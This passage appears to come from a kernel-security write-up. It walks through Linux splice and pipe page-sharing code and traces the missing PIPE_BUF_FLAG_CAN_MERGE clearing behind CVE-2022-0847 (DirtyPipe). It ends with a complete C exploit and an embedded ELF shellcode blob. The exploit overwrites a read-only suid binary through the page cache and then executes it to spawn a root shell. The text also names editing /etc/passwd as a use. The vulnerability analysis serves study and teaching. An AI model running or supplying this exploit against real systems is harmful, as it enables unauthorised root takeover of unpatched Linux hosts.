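     * between ipipe and opipe and PIPE_BUF_FLAG_CAN_MERGE is cleared on obuf */
    if (splice(a[0], NULL, b[1], NULL, 5, 0) < 0)
        return 1;

    /* len (64) >= ibuf->len (6 remaining bytes): the whole buffer is moved over */
    splice(a[0], NULL, b[1], NULL, 64, 0);

    ssize_t n = read(b[0], buf, sizeof(buf));
    printf("read %zd bytes from the second pipe: %.*s\n", n, (int)n, buf);
    return 0;
}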

do_splice_from ends up calling iter_file_splice_write, which writes the pipe_buffer data to the file in the form of an I/O vector. Nothing much to analyze here.

ssize_t
iter_file_splice_write(struct pipe_inode_info *pipe, struct file *out,
loff_t *ppos, size_t len, unsigned int flags)
{
struct splice_desc sd = {
.total_len = len,
.flags = flags,
.pos = *ppos,
.u.file = out,
};
int nbufs = pipe->max_usage;
struct bio_vec *array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
ssize_t ret;

if (unlikely(!array))
return -ENOMEM;

pipe_lock(pipe);

splice_from_pipe_begin(&sd);
while (sd.total_len) {
struct iov_iter from;
unsigned int head, tail, mask;
size_t left;
int n;

ret = splice_from_pipe_next(pipe, &sd);
if (ret <= 0)
break;

if (unlikely(nbufs < pipe->max_usage)) {
kfree(array);
nbufs = pipe->max_usage;
array = kcalloc(nbufs, sizeof(struct bio_vec),
GFP_KERNEL);
if (!array) {
ret = -ENOMEM;
break;
}
}

head = pipe->head;
tail = pipe->tail;
mask = pipe->ring_size - 1;

/* build the vector */
left = sd.total_len;
for (n = 0; !pipe_empty(head, tail) && left && n < nbufs; tail++, n++) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t this_len = buf->len;

if (this_len > left)
this_len = left;

ret = pipe_buf_confirm(pipe, buf);
if (unlikely(ret)) {
if (ret == -ENODATA)
ret = 0;
goto done;
}

array[n].bv_page = buf->page;
array[n].bv_len = this_len;
array[n].bv_offset = buf->offset;
left -= this_len;
}

iov_iter_bvec(&from, WRITE, array, n, sd.total_len - left);
ret = vfs_iter_write(out, &from, &sd.pos, 0);
if (ret <= 0)
break;

sd.num_spliced += ret;
sd.total_len -= ret;
*ppos = sd.pos;

/* dismiss the fully eaten buffers, adjust the partial one */
tail = pipe->tail;
while (ret) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
if (ret >= buf->len) {
ret -= buf->len;
buf->len = 0;
pipe_buf_release(pipe, buf);
tail++;
pipe->tail = tail;
if (pipe->files)
sd.need_wakeup = true;
} else {
buf->offset += ret;
buf->len -= ret;
ret = 0;
}
}
}
done:
kfree(array);
splice_from_pipe_end(pipe, &sd);

pipe_unlock(pipe);

if (sd.num_spliced)
ret = sd.num_spliced;

return ret;
}

EXPORT_SYMBOL(iter_file_splice_write);

do_splice_to ends up calling copy_page_to_iter_pipe to do the actual per-page "copy".
The approach is again page sharing: the file's page cache page is shared with obuf.

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

Safety analysis of the shared pages

As seen above, the splice paths make heavy use of page sharing to "copy" data, which intuitively feels unsafe.
Let's analyze the three page-sharing sites in detail.

Initial state: in the diagrams, the blue part of a page is data already in the buffer, the white part is free space, and the red part is the data this splice is about to send.

Site 1

static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
......
do {
......
ibuf = &ipipe->bufs[i_tail & i_mask];
obuf = &opipe->bufs[o_head & o_mask];

if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
}

After the copy it looks like this: ibuf still holds a pointer to the page, but since buf->ops has been cleared it can no longer release the page or otherwise operate on it, so that much is safe. Now consider each side's ability to read and write the page. On the ibuf side, tail has already moved past it, so the page can no longer be read, and with head == tail it cannot be written to again via a merge either. The ibuf side has therefore completely lost access to the page, and even if the obuf side writes to it again through a merge, the ibuf side is not affected at all.

Of course ibuf's head may actually be greater than tail; merges are then possible, but they cannot land on the page that was just shared, so ibuf still has no access to it.

Site 2

	/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;

/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;

Start again with release-type operations. Here only part of the data in ibuf->page was sent, so ibuf must keep holding the page; pipe_buf_get takes an extra reference on it, so neither end can release the page too early. As for read/write ability: the ibuf side can keep reading and writing the page normally (writes happen via merge), while the obuf side, with PIPE_BUF_FLAG_CAN_MERGE cleared, can only read it.

ibuf can write and obuf can read, so there is a risk of overwriting, but the independent offset and len fields in ibuf and obuf already rule out that conflict (obuf can only read the red region, while ibuf can only write into the white region).

Site 3

off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;

First, get_page takes an extra reference on the page, so releasing it is safe.
The input side is the file's page cache, which always retains read access to the page.
The obuf side can read, but its reads are bounded by obuf's offset and len fields, which is safe.
However, since the PIPE_BUF_FLAG_CAN_MERGE bit was not cleared, obuf also has the ability to write to the page.

Now the read/write conflict:
the page cache's read range is the whole page, while obuf's write range is the blue region, so a conflict clearly exists. A merged write through obuf can overwrite the file's page cache.

CVE-2022-0847 DirtyPipe

DirtyPipe is caused by exactly this problem. Exploiting it lets you write to read-only files, for example modifying /etc/passwd, or writing shellcode into a suid binary to escalate privileges.

Below is a simple exploit.

#include <kernelpwn.h>


unsigned char shellcode[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

int main(int argc,char* argv[])
{
setvbuf(stdout,NULL,_IONBF,0);
setvbuf(stderr,NULL,_IONBF,0);

if(argc != 2)
{
loge("usage: ./exploit [target]");
exit(0);
}

char* targetFile = argv[1];

int targetFd = open(targetFile,O_RDONLY);
if(targetFd < 0)
err_exit("open targetFile");

int pipeFd[2];
pipe(pipeFd);

//fill the pipe completely and then drain it, so that every pipe_buffer carries the PIPE_BUF_FLAG_CAN_MERGE flag
char buf[PAGE_SIZE];
size_t totalSize = 16*PAGE_SIZE;
size_t ret_sz;
while (totalSize)
{
ret_sz = write(pipeFd[1],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

totalSize = 16*PAGE_SIZE;
while (totalSize)
{
ret_sz = read(pipeFd[0],buf,PAGE_SIZE);
totalSize -= ret_sz;
}

//trigger the vulnerability: splice 1 byte from the target file into the pipe
int ret = splice(targetFd,NULL,pipeFd[1],NULL,1,0);
if(ret < 0)
err_exit("splice");

//write into the target file (the write merges into the shared page cache page)
ret = write(pipeFd[1],shellcode+1,sizeof(shellcode)-1);
logd("write %d",ret);

system(targetFile);

return 0;
}